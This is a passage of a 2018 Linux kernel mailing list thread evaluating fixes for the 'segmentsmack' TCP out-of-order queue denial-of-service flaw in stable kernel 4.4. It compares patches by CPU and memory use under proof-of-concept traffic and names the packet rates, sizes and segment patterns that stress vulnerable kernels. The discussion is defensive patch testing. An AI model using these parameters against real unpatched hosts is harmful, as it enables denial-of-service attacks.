On 2018/8/17 0:06, Michal Kubecek wrote:
On Thu, Aug 16, 2018 at 05:24:09PM +0200, Greg KH wrote:
On Thu, Aug 16, 2018 at 02:33:56PM +0200, Michal Kubecek wrote:
Anyway, even at this rate, I only get ~10% of one core (Intel E5-2697).
What I can see, though, is that with current stable 4.4 code, modified testcase which sends something like
2:3, 3:4, ..., 3001:3002, 3003:3004, 3004:3005, ... 6001:6002, ...
I quickly eat 6 MB of memory for receive queue of one socket while earlier 4.4 kernels only take 200-300 KB. I didn't test latest 4.4 with Takashi's follow-up yet but I'm pretty sure it will help while preserving nice performance when using the original segmentsmack testcase (with increased packet ratio).
Ok, for now I've applied Takashi's fix to the 4.4 stable queue and will push out a new 4.4-rc later tonight. Can everyone standardize on that and test and let me know if it does, or does not, fix the reported issues?
I did repeat the tests with Takashi's fix and the CPU utilization is similar to what we have now, i.e. 3-5% with 10K pkt/s. I could still saturate one CPU somewhere around 50K pkt/s but that already requires 2.75 MB/s (22 Mb/s) of throughput. (My previous tests with Mao Wenan's changes in fact used lower speeds as the change from 128 to 1024 would need to be done in two places.)
Where Takashi's patch does help is that it does not prevent collapsing of ranges of adjacent segments with total length shorter than ~4KB. It took more time to verify: it cannot be checked by watching the socket memory consumption with ss as tcp_collapse_ofo_queue isn't called until we reach the limits. So I needed to trace when and how tcp_collpse() is called with both current stable 4.4 code and one with Takashi's fix.
The POC is default to attack Raspberry Pi system, whose cpu performance is lower, so the default parameter is not aggressive, we would enlarge parameter to test in our intel skylake system(with high performance), if don't do this, cpu usage isn't obvious different with fixed patch and without fixed patch, you can't distinguish whether the patch can really fix it or not.
I have made series testing here, including low rate attacking(128B,100ms interval) and high rate attacking(1024B,10ms interval), with original 4.4 kernel, only Takashi's patch, and only Mao Wenan's patches. I will check the cpu usage of ksoftirq.
original Takashi Mao Wenan low rate 3% 2% 2% high rate 50% 49% ~10%
so, I can't identify whether Takashi's patch can really fix radical issue, which I think the root reason exist in simple queue, and Eric's patch 72cd43ba tcp: free batches of packets in tcp_prune_ofo_queue() can completely fix this, which have already involved in my patch series. This patch need change simple queue to RB tree, and it is high efficiency searching and dropping packets, and avoid large tcp retransmitting. so cpu usage will be fall down.
If not, we can go from there and evaluate this much larger patch series. But let's try the simple thing first.
At high packet rates (say 30K pkt/s and more), we can still saturate the CPU. This is also mentioned in the announcement with claim that switch to rbtree based queue would be necessary to fully address that. My tests seem to confirm that but I'm still not sure it is worth backporting something as intrusive into stable 4.4.
Michal Kubecek
.